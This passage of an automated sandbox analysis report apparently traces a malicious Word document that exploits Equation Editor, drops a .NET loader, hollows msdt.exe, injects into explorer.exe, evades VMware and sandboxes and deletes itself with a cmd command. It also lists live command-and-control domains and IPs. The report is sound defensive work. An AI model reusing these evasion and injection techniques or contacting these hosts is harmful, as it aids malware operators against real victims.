          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC48 NtSetInformationFile,7_2_025EFC48
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0C40 NtGetContextThread,7_2_025F0C40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC30 NtOpenProcess,7_2_025EFC30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC90 NtUnmapViewOfSection,7_2_025EFC90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFD5C NtEnumerateKey,7_2_025EFD5C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1D80 NtSuspendThread,7_2_025F1D80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000985F0 NtCreateFile,7_2_000985F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000986A0 NtReadFile,7_2_000986A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_00098720 NtClose,7_2_00098720
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000987D0 NtAllocateVirtualMemory,7_2_000987D0
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: PO789.docVirustotal: Detection: 57%
          Source: PO789.docReversingLabs: Detection: 53%
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO789.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDB31.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/9@6/5
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: medicomzx[1].exe.2.dr, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: medicomsh78694.exe.2.dr, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs.Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037AAA8 push eax; retn 0036h4_2_0037AAA9
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037EB30 push ebx; ret 4_2_0037EB31
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037ABC8 push esp; ret 4_2_0037ABC9
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037B558 push eax; retf 0036h4_2_0037B559
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B832 push eax; ret 5_2_0041B838
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041C940 push dword ptr [D38E3050h]; ret 5_2_0041C961
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00409BCE push edx; retf 5_2_00409BCF
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00413FD9 push edx; ret 5_2_00413FDB
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0040B7F3 push ebp; iretd 5_2_0040B7F9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FDFA1 push ecx; ret 7_2_025FDFB4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.16750619992
          Source: initial sampleStatic PE information: section name: .text entropy: 7.16750619992
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\medicomsh78694.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: medicomsh78694.exe PID: 2824, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000088614 second address: 000000000008861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000000889AE second address: 00000000000889B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2552Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe TID: 2032Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004088E0 rdtsc 5_2_004088E0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000000.514300664.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.425259363.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004088E0 rdtsc 5_2_004088E0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC26F8 mov eax, dword ptr fs:[00000030h]5_2_00BC26F8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026026F8 mov eax, dword ptr fs:[00000030h]7_2_026026F8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00409B50 LdrLoadDll,5_2_00409B50
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.muzicalbox.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.13 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.extraordinarymiracle.com
          Source: C:\Windows\explorer.exeDomain query: www.realstakepool.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 109.94.209.123 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.prestigiousuniforms.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: C40000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory written: C:\Users\user\AppData\Roaming\medicomsh78694.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
